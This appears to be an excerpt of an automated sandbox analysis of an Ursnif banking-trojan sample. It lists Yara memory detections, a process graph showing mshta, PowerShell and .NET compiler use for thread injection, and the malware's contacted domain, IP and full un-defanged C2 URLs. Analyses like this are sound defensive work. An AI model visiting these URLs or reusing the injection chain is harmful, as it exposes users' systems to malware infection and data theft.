Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001F35 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_10001F35
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.267174512.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267021391.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267187434.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267110457.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267049482.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.412616743.00000000031BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267090399.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.457204076.000001D35D1C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267156690.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267129257.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6716, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6528, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.267174512.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267021391.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267187434.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267110457.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267049482.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.412616743.00000000031BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267090399.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.457204076.000001D35D1C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267156690.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267129257.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6716, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6528, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 341463 Sample: 6006bde674be5pdf.dll Startdate: 19/01/2021 Architecture: WINDOWS Score: 100 53 8.8.8.8.in-addr.arpa 2->53 55 1.0.0.127.in-addr.arpa 2->55 57 2 other IPs or domains 2->57 61 Found malware configuration 2->61 63 Yara detected  Ursnif 2->63 65 Sigma detected: Dot net compiler compiles file from suspicious location 2->65 67 8 other signatures 2->67 9 mshta.exe 19 2->9         started        12 loaddll32.exe 1 2->12         started        14 iexplore.exe 1 55 2->14         started        16 2 other processes 2->16 signatures3 process4 dnsIp5 77 Suspicious powershell command line found 9->77 19 powershell.exe 9->19         started        79 Writes or reads registry keys via WMI 12->79 81 Writes registry values via WMI 12->81 23 iexplore.exe 31 14->23         started        26 iexplore.exe 29 14->26         started        28 iexplore.exe 29 14->28         started        51 192.168.2.1 unknown unknown 16->51 30 iexplore.exe 35 16->30         started        32 iexplore.exe 31 16->32         started        signatures6 process7 dnsIp8 47 C:\Users\user\AppData\Local\...\q35sbhot.0.cs, UTF-8 19->47 dropped 49 C:\Users\user\AppData\...\cw4ltk3l.cmdline, UTF-8 19->49 dropped 69 Modifies the context of a thread in another process (thread injection) 19->69 71 Maps a DLL or memory area into another process 19->71 73 Compiles code for process injection (via .Net compiler) 19->73 75 Creates a thread in another existing process (thread injection) 19->75 34 csc.exe 19->34         started        37 csc.exe 19->37         started        39 conhost.exe 19->39         started        59 lopppooole.xyz 185.186.244.49, 49734, 49735, 49736 WEBZILLANL Netherlands 23->59 file9 signatures10 process11 file12 43 C:\Users\user\AppData\Local\...\cw4ltk3l.dll, PE32 34->43 dropped 41 cvtres.exe 34->41         started        45 C:\Users\user\AppData\Local\...\q35sbhot.dll, PE32 37->45 dropped process13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.186.244.49
 unknown Netherlands
35415 WEBZILLANL false

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
resolver1.opendns.com 208.67.222.222 true
lopppooole.xyz 185.186.244.49 true
1.0.0.127.in-addr.arpa unknown unknown
8.8.8.8.in-addr.arpa unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://lopppooole.xyz/manifest/oyJf0dGchaAIoPel8/K1RFX8SwNbhQ/LLcUCPEPYkE/8YDGV2vEEgf7ZQ/cuAAx0dK_2BD_2BCaXfl8/tYaseMvEDk08K6JZ/EQ1XEWDhVGtM7k6/BJ4Pdn_2BFeo6ztzsI/hH1xi6vBb/jeSTvozPXDGpukgDPifK/ZqYCwBGYzwKmTN9WLyu/YJCKUABXAbPwOK69xlPBEF/QfRL.cnx false
  • Avira URL Cloud: safe
 unknown
http://lopppooole.xyz/manifest/3mgKpbqap/nRh42wkizRuvQnbKS_2F/cCGI9puqMbPkyNKOhmJ/b6rBRnCNcK3Gj8zdaEyqxk/VAqy1dm3jpPlG/j1RG_2Bc/1uTqOdAEPiJDVBM_2BK9PM9/y0tKrkAQ_2/FftiHkrj4ukmbz_2B/G_2FPN2wDsAF/U672kCrC9_2/BSj9NgQY4NjW4D/90Kz0XaJ1enkeMLmCHfkG/BeMe0t_2/F.cnx false
  • Avira URL Cloud: safe
 unknown
http://lopppooole.xyz/favicon.ico false
  • Avira URL Cloud: safe
 unknown